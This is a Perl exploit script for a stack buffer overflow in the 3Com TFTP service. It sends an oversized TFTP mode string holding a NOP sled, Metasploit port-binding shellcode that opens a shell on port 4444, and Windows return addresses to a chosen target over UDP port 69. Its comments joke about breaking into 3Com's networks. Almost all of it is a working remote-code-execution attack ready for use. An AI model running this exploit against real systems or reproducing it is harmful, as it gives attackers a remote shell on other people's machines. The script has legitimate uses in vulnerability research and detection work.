#!/usr/bin/perl
# 3com_tftp_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Easily owns ancient 3CTftpSvc.zip
# <JOKE!@#$% OK!@#$% JOKE!@#$%>
# Now how about a time machine and axx to 3com internal networks!
# </JOKE!@#$% OK!@#$% JOKE!@#$%>

use IO::Socket;

$win2ksp4  = 0x77E43292; # user32.dll JMP ESI
$winxpsp3  = 0x7E485184; # user32.dll JMP ESI
$test1234  = 0x41424344; # Debugging Purposes

      # Win32 Portbind Shellcode (pexfnstsub/metasploit,size=344,port=4444)
$shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x49".
      "\x35\x87\x48\x83\xeb\xfc\xe2\xf4\xb5\x5f\x6c\x05\xa1\xcc\x78\xb7".
      "\xb6\x55\x0c\x24\x6d\x11\x0c\x0d\x75\xbe\xfb\x4d\x31\x34\x68\xc3".
      "\x06\x2d\x0c\x17\x69\x34\x6c\x01\xc2\x01\x0c\x49\xa7\x04\x47\xd1".
      "\xe5\xb1\x47\x3c\x4e\xf4\x4d\x45\x48\xf7\x6c\xbc\x72\x61\xa3\x60".
      "\x3c\xd0\x0c\x17\x6d\x34\x6c\x2e\xc2\x39\xcc\xc3\x16\x29\x86\xa3".
      "\x4a\x19\x0c\xc1\x25\x11\x9b\x29\x8a\x04\x5c\x2c\xc2\x76\xb7\xc3".
      "\x09\x39\x0c\x38\x55\x98\x0c\x08\x41\x6b\xef\xc6\x07\x3b\x6b\x18".
      "\xb6\xe3\xe1\x1b\x2f\x5d\xb4\x7a\x21\x42\xf4\x7a\x16\x61\x78\x98".
      "\x21\xfe\x6a\xb4\x72\x65\x78\x9e\x16\xbc\x62\x2e\xc8\xd8\x8f\x4a".
      "\x1c\x5f\x85\xb7\x99\x5d\x5e\x41\xbc\x98\xd0\xb7\x9f\x66\xd4\x1b".
      "\x1a\x66\xc4\x1b\x0a\x66\x78\x98\x2f\x5d\x96\x14\x2f\x66\x0e\xa9".
      "\xdc\x5d\x23\x52\x39\xf2\xd0\xb7\x9f\x5f\x97\x19\x1c\xca\x57\x20".
      "\xed\x98\xa9\xa1\x1e\xca\x51\x1b\x1c\xca\x57\x20\xac\x7c\x01\x01".
      "\x1e\xca\x51\x18\x1d\x61\xd2\xb7\x99\xa6\xef\xaf\x30\xf3\xfe\x1f".
      "\xb6\xe3\xd2\xb7\x99\x53\xed\x2c\x2f\x5d\xe4\x25\xc0\xd0\xed\x18".
      "\x10\x1c\x4b\xc1\xae\x5f\xc3\xc1\xab\x04\x47\xbb\xe3\xcb\xc5\x65".
      "\xb7\x77\xab\xdb\xc4\x4f\xbf\xe3\xe2\x9e\xef\x3a\xb7\x86\x91\xb7".
      "\x3c\x71\x78\x9e\x12\x62\xd5\x19\x18\x64\xed\x49\x18\x64\xd2\x19".
      "\xb6\xe5\xef\xe5\x90\x30\x49\x1b\xb6\xe3\xed\xb7\xb6\x02\x78\x98".
      "\xc2\x62\x7b\xcb\x8d\x51\x78\x9e\x1b\xca\x57\x20\xb9\xbf\x83\x17".
      "\x1a\xca\x51\xb7\x99\x35\x87\x48";

$target    = $ARGV[0];
$os        = $ARGV[1];

if(!defined($target) || !defined($os))
{

     print "Usage: $0 <1.2.3.4> [1=win2ksp4/2=winxpsp3/3=test1234]\n";

}

if($os == "1") { $retaddr = pack('l', $win2ksp4); }
if($os == "2") { $retaddr = pack('l', $winxpsp3); }
if($os == "3") { $retaddr = pack('l', $test1234); }

# [packet]   write      filename  start mode    start our payload (transport mode name)
$payload = "\x00\x02" . "roffles" . "\x00" . "\x90" x 129 . $shellcode . $retaddr . "\x00"; # 129 + 344 + 4 = 477

$sock = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$target, PeerPort=>'69') or die "Error: $target/69\n";

     print $sock $payload;
     close($sock);

exit;